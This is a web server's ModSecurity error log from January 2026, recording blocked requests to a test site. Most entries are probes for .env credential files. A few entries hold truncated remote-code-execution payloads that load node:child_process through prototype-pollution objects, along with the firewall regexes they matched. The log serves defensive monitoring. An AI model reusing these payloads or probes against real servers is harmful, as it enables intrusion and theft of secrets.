[Sun Jan 04 06:31:38.605516 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.605667 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Mon Jan 05 05:56:15.946719 2026] [:error] [pid 1204260] [client 139.59.224.88:51526] [client 139.59.224.88] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVtEb0EaV0lzGQDwXHTTHwAAAAM"]
[Mon Jan 05 05:56:15.947022 2026] [:error] [pid 1204260] [client 139.59.224.88:51526] [client 139.59.224.88] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVtEb0EaV0lzGQDwXHTTHwAAAAM"]
[Mon Jan 05 05:56:15.947185 2026] [:error] [pid 1204260] [client 139.59.224.88:51526] [client 139.59.224.88] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVtEb0EaV0lzGQDwXHTTHwAAAAM"]
[Mon Jan 05 10:11:16.617199 2026] [:error] [pid 1204261] [client 204.76.203.25:54126] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVuANKw0o2vTmEjFTE4NbwAAAAQ"]
[Mon Jan 05 10:11:16.617460 2026] [:error] [pid 1204261] [client 204.76.203.25:54126] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVuANKw0o2vTmEjFTE4NbwAAAAQ"]
[Mon Jan 05 10:11:16.617624 2026] [:error] [pid 1204261] [client 204.76.203.25:54126] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVuANKw0o2vTmEjFTE4NbwAAAAQ"]
[Tue Jan 06 02:27:12.613468 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Rule 7f0a0e9fb898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.613561 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Rule 7f0a0e9f0760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.615305 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.615437 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Rule 7f0a0e1cfbf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.615597 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.615738 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.617452 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Rule 7f0a0e647320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.617585 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Rule 7f0a0e63e030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.624096 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 02:27:12.624253 2026] [:error] [pid 1223532] [client 64.226.70.57:56994] [client 64.226.70.57] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVxk8GgsK_oOf-6FDnDLcQAAAAI"]
[Tue Jan 06 03:16:03.459913 2026] [:error] [pid 1225969] [client 204.76.203.25:57060] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVxwY9RCj0-Bus2fGAEs1AAAAAQ"]
[Tue Jan 06 03:16:03.460220 2026] [:error] [pid 1225969] [client 204.76.203.25:57060] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVxwY9RCj0-Bus2fGAEs1AAAAAQ"]
[Tue Jan 06 03:16:03.460445 2026] [:error] [pid 1225969] [client 204.76.203.25:57060] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVxwY9RCj0-Bus2fGAEs1AAAAAQ"]
[Tue Jan 06 20:17:10.097427 2026] [:error] [pid 1227562] [client 194.195.116.230:60320] [client 194.195.116.230] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271))) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271))).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aV1ftrI0eQF6GJp4ezHYEQAAAAg"]
[Tue Jan 06 20:17:10.098658 2026] [:error] [pid 1227562] [client 194.195.116.230:60320] [client 194.195.116.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aV1ftrI0eQF6GJp4ezHYEQAAAAg"]
[Tue Jan 06 20:17:10.098827 2026] [:error] [pid 1227562] [client 194.195.116.230:60320] [client 194.195.116.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aV1ftrI0eQF6GJp4ezHYEQAAAAg"]
[Wed Jan 07 03:48:30.554568 2026] [:error] [pid 1248391] [client 45.148.10.159:54330] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV3JfjNvD-ZISLd-2fIwsgAAAAI"]
[Wed Jan 07 03:48:30.554810 2026] [:error] [pid 1248391] [client 45.148.10.159:54330] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV3JfjNvD-ZISLd-2fIwsgAAAAI"]
[Wed Jan 07 03:48:30.555702 2026] [:error] [pid 1248391] [client 45.148.10.159:54330] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV3JfjNvD-ZISLd-2fIwsgAAAAI"]
[Wed Jan 07 03:48:45.550258 2026] [:error] [pid 1248394] [client 45.148.10.159:51464] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aV3JjSKP3LfiSmVjqw0tNwAAAAU"]
[Wed Jan 07 03:48:45.550479 2026] [:error] [pid 1248394] [client 45.148.10.159:51464] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aV3JjSKP3LfiSmVjqw0tNwAAAAU"]
[Wed Jan 07 03:48:45.550641 2026] [:error] [pid 1248394] [client 45.148.10.159:51464] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aV3JjSKP3LfiSmVjqw0tNwAAAAU"]
[Wed Jan 07 03:48:45.597668 2026] [:error] [pid 1248394] [client 45.148.10.159:51464] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aV3JjSKP3LfiSmVjqw0tOAAAAAU"]
[Wed Jan 07 03:48:45.597863 2026] [:error] [pid 1248394] [client 45.148.10.159:51464] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aV3JjSKP3LfiSmVjqw0tOAAAAAU"]
[Wed Jan 07 03:48:45.598019 2026] [:error] [pid 1248394] [client 45.148.10.159:51464] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aV3JjSKP3LfiSmVjqw0tOAAAAAU"]
[Wed Jan 07 03:48:45.739700 2026] [:error] [pid 1248389] [client 45.148.10.159:51466] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JjahAlUMkVcegDmo7hQAAAAA"]
[Wed Jan 07 03:48:45.739899 2026] [:error] [pid 1248389] [client 45.148.10.159:51466] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JjahAlUMkVcegDmo7hQAAAAA"]
[Wed Jan 07 03:48:45.740075 2026] [:error] [pid 1248389] [client 45.148.10.159:51466] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JjahAlUMkVcegDmo7hQAAAAA"]
[Wed Jan 07 03:48:52.776575 2026] [:error] [pid 1248391] [client 45.148.10.159:49776] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JlDNvD-ZISLd-2fIwswAAAAI"]
[Wed Jan 07 03:48:52.776800 2026] [:error] [pid 1248391] [client 45.148.10.159:49776] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JlDNvD-ZISLd-2fIwswAAAAI"]
[Wed Jan 07 03:48:52.776979 2026] [:error] [pid 1248391] [client 45.148.10.159:49776] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JlDNvD-ZISLd-2fIwswAAAAI"]
